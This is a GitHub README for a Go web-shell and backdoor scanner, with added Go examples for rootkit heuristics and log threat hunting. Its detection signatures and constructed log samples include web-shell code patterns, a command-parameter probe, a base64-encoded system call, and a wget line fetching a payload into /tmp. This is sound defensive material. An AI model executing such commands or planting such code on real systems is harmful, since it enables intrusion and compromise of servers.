https://github.com/aryma-f4/worldshellfinder
Web shell finder built on grep: it matches files against regex rules and a wordlist of shell markers collected from around the world. Lightweight and fast!
- Host: GitHub
- URL: https://github.com/aryma-f4/worldshellfinder
- Owner: Aryma-f4
- License: mit
- Created: 2024-09-24T07:52:26.000Z (over 1 year ago)
- Default Branch: master
- Last Pushed: 2025-02-06T01:53:20.000Z (about 1 year ago)
- Last Synced: 2025-12-02T17:58:32.188Z (5 months ago)
- Topics: backdoor, backdoor-defense, backdoor-finder, cyber-security, cybersecurity, finder, finder-shell, security, security-scanner, shell, shell-detection, shell-detector, shell-finder, shell-script, web-shell, webshell, worldfind, worldshellfinder
- Language: Go
- Homepage:
- Size: 9.35 MB
- Stars: 31
- Watchers: 2
- Forks: 5
- Open Issues: 0
Metadata Files:
- Readme: readme.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
README
# World Shell Finder
World Shell Finder is a Go command-line tool for detecting suspicious web shells and backdoors inside web roots or other source directories. It combines keyword matching, regex rules, and heuristic scoring to improve detection quality while reducing noisy single-hit matches.


## Disclaimer
This project is intended for educational, incident response, and defensive security use. It does not replace a full malware analysis process. False positives and false negatives are still possible.
## Highlights
- Refactored into a **Clean Architecture** to ensure modularity, maintainability, and scalability.
- Beautiful, intuitive **Interactive UI** powered by `pterm`.
- Integrates **VirusTotal API** as a malware reference database to improve detection rules and confirm suspicious files.
- Detects suspicious files using a scoring-based engine.
- Combines keyword matches, regex signatures, and heuristic indicators.
- Supports custom wordlists on top of the embedded default wordlist.
- Produces clearer output with suspicion score and evidence summary.
- Includes a string-removal mode for cleanup workflows.
- Ships with GitHub Actions CI/CD and automatic prereleases on each push to `main` or `master`.
- Includes deep scan mode for suspicious traffic and broader rootkit checks.
## Detection Approach
The scanner evaluates files using multiple signals:
- Strong signatures such as obfuscated `eval(base64_decode(...))` patterns.
- Dangerous runtime execution flows like `system($_REQUEST['cmd'])`.
- Upload and dropper behavior such as `move_uploaded_file(... .php)`.
- Heuristic combinations like user input plus command execution.
- Known shell markers from the bundled wordlist.
Files are reported when their suspicion score reaches the configured threshold.
## Installation
### Build from source
```bash
git clone https://github.com/Aryma-f4/worldshellfinder.git
cd worldshellfinder
go build -o worldshellfinder .
```
### Install with Go
```bash
go install github.com/Aryma-f4/worldshellfinder@latest
```
If `$HOME/go/bin` (where `go install` places binaries) is not on your `PATH`, add it first:
```bash
export PATH="$PATH:$HOME/go/bin"
```
## Usage
### Interactive mode
Run the program without flags to use the menu-based interactive mode:
```bash
./worldshellfinder
```
### Detection mode
Basic detection:
```bash
./worldshellfinder -mode detect -dir /var/www/html
```
Verbose detection:
```bash
./worldshellfinder -mode detect -dir /var/www/html -v
```
Detection with a custom wordlist:
```bash
./worldshellfinder -mode detect -dir /var/www/html -wordlist ./wordlists/zeus.txt
```
Detection with a stricter threshold:
```bash
./worldshellfinder -mode detect -dir /var/www/html -min-score 6 -max-evidence 8
```
Save results to a file:
```bash
./worldshellfinder -mode detect -dir /var/www/html -out result.txt
```
### Deep scan mode
Deep scan combines:
- file-based shell detection,
- suspicious traffic inspection,
- threat hunting on common auth, nginx, and apache logs,
- rootkit checks using `rkhunter`, `chkrootkit`, `unhide`, and built-in heuristics.
Example:
```bash
./worldshellfinder -mode deep -dir /var/www/html -out deep-report.txt -v
```
### Remove-string mode
```bash
./worldshellfinder -mode remove -dir /var/www/html -remove-string "malicious_snippet"
```
### Help
```bash
./worldshellfinder -h
```
## CLI Options
```text
-h, --help              Show help information
-v                      Enable verbose output
-mode string            Operation mode: detect, deep, or remove
-dir string             Directory to scan
-out string             Output file path
-wordlist string        Additional custom wordlist file
-min-score int          Minimum score before a file is reported
-max-evidence int       Maximum evidence entries shown per file
-remove-string string   String to remove when mode=remove
-vt-api-key string      VirusTotal API key for checking suspicious files against the malware database
--update                Update to the latest release
```
## Wordlists
The wordlist format is simple:
- One keyword or signature per line.
- Empty lines are ignored.
- Custom entries are merged with the embedded default wordlist.
See:
- [`wordlists/default.txt`](wordlists/default.txt)
- [`wordlists/zeus.txt`](wordlists/zeus.txt)
## Known Coverage
The repository also documents many shell families and samples already covered by the project:
- [Known shell list](list_find_already_shell.md)
## CI/CD
GitHub Actions now provides:
- Test execution on pull requests and pushes.
- Multi-platform build artifacts for Linux, Windows, and macOS.
- Automatic prerelease creation for every push to `main` or `master`.
- Attached archives and checksum file in each generated release.
## Rootkit Detection
Deep scan does not rely on a single tool. It can use:
- `rkhunter`
- `chkrootkit`
- `unhide`
- built-in heuristic checks for preload abuse, suspicious modules, hidden executables, temporary privilege-escalation binaries, and persistence points
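Two of the built-in heuristic classes named above, written out as an added example (not the project's code) so the logic is visible: a parser for `/etc/ld.so.preload` that flags entries outside the normal library directories, and mode checks for setuid/setgid or hidden executables under temp directories. The directory lists, the bits treated as suspicious and the sample preload contents are this example's assumptions.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// trustedLibDirs hold legitimately preloaded libraries; a preload entry anywhere else,
// above all in a world-writable path, is the classic userland rootkit hook.
var trustedLibDirs = []string{"/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/"}

// tempDirs are world-writable staging areas where attackers drop helpers.
var tempDirs = []string{"/tmp", "/var/tmp", "/dev/shm"}

// CheckPreload parses the text of /etc/ld.so.preload and returns entries outside the
// trusted library directories. On most servers the file is absent or empty, so any
// entry at all deserves a look; this function only ranks the worst ones.
func CheckPreload(content string) (hits []string) {
	for _, line := range strings.Split(content, "\n") {
		entry := strings.TrimSpace(line)
		if entry == "" || strings.HasPrefix(entry, "#") {
			continue
		}
		trusted := false
		for _, d := range trustedLibDirs {
			if strings.HasPrefix(entry, d) {
				trusted = true
			}
		}
		if !trusted {
			hits = append(hits, entry)
		}
	}
	return hits
}

// inTempDir reports whether path lies under one of tempDirs (after Clean, so ".." tricks do not hide it).
func inTempDir(path string) bool {
	clean := filepath.Clean(path)
	for _, d := range tempDirs {
		if strings.HasPrefix(clean, d+"/") {
			return true
		}
	}
	return false
}

// IsTempPrivEsc flags a regular executable under a temp dir that carries setuid or
// setgid: the shape of a leftover privilege-escalation helper.
func IsTempPrivEsc(path string, mode os.FileMode) bool {
	return mode.IsRegular() && mode&(os.ModeSetuid|os.ModeSetgid) != 0 &&
		mode&0o111 != 0 && inTempDir(path)
}

// IsHiddenExecutable flags a dot-file with execute bits under a temp dir; legitimate
// software does not hide executables there.
func IsHiddenExecutable(path string, mode os.FileMode) bool {
	return mode.IsRegular() && mode&0o111 != 0 &&
		strings.HasPrefix(filepath.Base(path), ".") && inTempDir(path)
}

func main() {
	if b, err := os.ReadFile("/etc/ld.so.preload"); err == nil {
		for _, h := range CheckPreload(string(b)) {
			fmt.Println("[preload] untrusted entry:", h)
		}
	}
	for _, root := range tempDirs {
		// Unreadable entries are skipped; run as root for full coverage.
		filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
			if err != nil || d.IsDir() {
				return nil
			}
			info, err := d.Info() // Lstat semantics: symlinks are not followed
			if err != nil {
				return nil
			}
			switch {
			case IsTempPrivEsc(p, info.Mode()):
				fmt.Println("[privesc] setuid/setgid binary in temp dir:", p)
			case IsHiddenExecutable(p, info.Mode()):
				fmt.Println("[hidden] hidden executable in temp dir:", p)
			}
			return nil
		})
	}
}
```

The classification functions are pure (path plus mode bits), so they can be unit-tested without touching the filesystem, and `main` only wires them to a real walk of the temp directories. Pairing these checks with `rkhunter` or `chkrootkit` is still worthwhile: a preload library can hook `readdir` and hide its own file from exactly this kind of walk, which is the gap `unhide`-style cross-checks exist to close.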
## Log Threat Hunting
Deep scan also inspects common log locations such as:
- `/var/log/auth.log`
- `/var/log/secure`
- `/var/log/nginx/access.log`
- `/var/log/apache2/access.log`
It looks for signs such as:
- `cmd=`, `exec=`, `shell=`, or encoded payload probes
- suspicious upload and dropper patterns
- repeated authentication failures and invalid users
- `sudo`, `curl`, `wget`, `nc`, or privilege escalation activity in auth logs
If the process lacks permission to inspect protected paths, the tool prints:
```text
not enough permission to do this, gotta root
```
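As an added example (not part of the project), the same kind of log hunting written in Go over constructed nginx and sshd/sudo lines that use RFC 5737 documentation addresses. The README does not publish the tool's own patterns, so the regexes, the three-failure threshold and the reason strings here are this example's choices. Both hunters read from any `io.Reader`, so pointing them at the real files listed above works the same way; as the README notes, those files need root to open.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"regexp"
	"strings"
)

// Finding is one suspicious log line and the reason it was flagged.
type Finding struct {
	Line   int
	Reason string
	Text   string
}

// failThreshold is how many failed logins from one source count as brute forcing.
const failThreshold = 3

// Web-log and auth-log signals, written from the README's list of signs. The patterns
// are this example's own; encodedArg is the noisiest, since long session tokens in
// query strings also match it, and \bnc\b can hit hostnames.
var (
	cmdParam    = regexp.MustCompile(`(?i)[?&](cmd|exec|shell)=`)
	dropper     = regexp.MustCompile(`"(?:POST|PUT) [^" ]*(?:upload|filemanager|/wp-content/uploads/[^" ]*\.php)`)
	encodedArg  = regexp.MustCompile(`(?i)[?&][a-z0-9_]+=(?:[A-Za-z0-9+/]{20,}={0,2}|(?:%[0-9a-f]{2}){8,})`)
	authFail    = regexp.MustCompile(`Failed password for (?:invalid user )?\S+ from (\S+)`)
	invalidUser = regexp.MustCompile(`Invalid user (\S+) from (\S+)`)
	authTool    = regexp.MustCompile(`\b(sudo|curl|wget|nc|ncat)\b`)
)

// HuntWebLog scans nginx/apache combined-format access-log lines; the first matching rule wins.
func HuntWebLog(r io.Reader) ([]Finding, error) {
	var out []Finding
	sc := bufio.NewScanner(r)
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		switch {
		case cmdParam.MatchString(line):
			out = append(out, Finding{n, "command parameter in request", line})
		case dropper.MatchString(line):
			out = append(out, Finding{n, "upload/dropper request", line})
		case encodedArg.MatchString(line):
			out = append(out, Finding{n, "encoded payload in request", line})
		}
	}
	return out, sc.Err()
}

// HuntAuthLog scans auth.log/secure lines for invalid users, repeated failures per
// source address, and network or privilege tooling showing up in the auth trail.
func HuntAuthLog(r io.Reader) ([]Finding, error) {
	var out []Finding
	fails := map[string]int{}
	sc := bufio.NewScanner(r)
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		if m := invalidUser.FindStringSubmatch(line); m != nil {
			out = append(out, Finding{n, "invalid user " + m[1] + " from " + m[2], line})
		}
		if m := authFail.FindStringSubmatch(line); m != nil {
			fails[m[1]]++
			if fails[m[1]] == failThreshold { // report once, when the threshold is crossed
				out = append(out, Finding{n, fmt.Sprintf("%d failed logins from %s", failThreshold, m[1]), line})
			}
		}
		if authTool.MatchString(line) {
			out = append(out, Finding{n, "sudo/network tooling in auth log", line})
		}
	}
	return out, sc.Err()
}

// Constructed sample lines using RFC 5737 documentation addresses, not real traffic.
const accessLog = `203.0.113.7 - - [12/Apr/2025:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2025:10:00:05 +0000] "GET /uploads/x.php?cmd=id HTTP/1.1" 200 64 "-" "curl/8.0"
203.0.113.7 - - [12/Apr/2025:10:00:09 +0000] "POST /wp-content/plugins/file-upload/uploader.php HTTP/1.1" 200 10 "-" "python-requests/2.31"
203.0.113.7 - - [12/Apr/2025:10:00:14 +0000] "GET /uploads/x.php?z=c3lzdGVtKCd3aG9hbWknKTs= HTTP/1.1" 200 20 "-" "curl/8.0"
198.51.100.2 - - [12/Apr/2025:10:01:00 +0000] "GET /blog/?p=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
`

const authLog = `Apr 12 10:02:01 web1 sshd[2201]: Invalid user admin from 203.0.113.7 port 40112
Apr 12 10:02:01 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 40112 ssh2
Apr 12 10:02:04 web1 sshd[2203]: Failed password for root from 203.0.113.7 port 40116 ssh2
Apr 12 10:02:07 web1 sshd[2205]: Failed password for root from 203.0.113.7 port 40120 ssh2
Apr 12 10:04:12 web1 sudo:   www-data : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/wget http://203.0.113.9/k -O /tmp/k
`

func main() {
	web, _ := HuntWebLog(strings.NewReader(accessLog))
	auth, _ := HuntAuthLog(strings.NewReader(authLog))
	for _, f := range append(web, auth...) {
		fmt.Printf("line %d: %s\n    %s\n", f.Line, f.Reason, f.Text)
	}
}
```

On the samples, the web hunter flags the `?cmd=id` probe, the POST to an uploader and the base64 query value (`system('whoami');` encoded), while the two benign page requests pass. The auth hunter flags the invalid-user attempt, reports the source once when its third failed login lands, and flags the `sudo` line in which `www-data` fetches a payload into `/tmp` with `wget`, which is the kind of post-exploitation step a web shell typically leads to.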
## Compatibility
- Linux
- Windows
- macOS
## Contributing
Contributions are welcome. Feel free to open an issue or submit a pull request for:
- new shell signatures,
- detection improvements,
- performance fixes,
- documentation updates.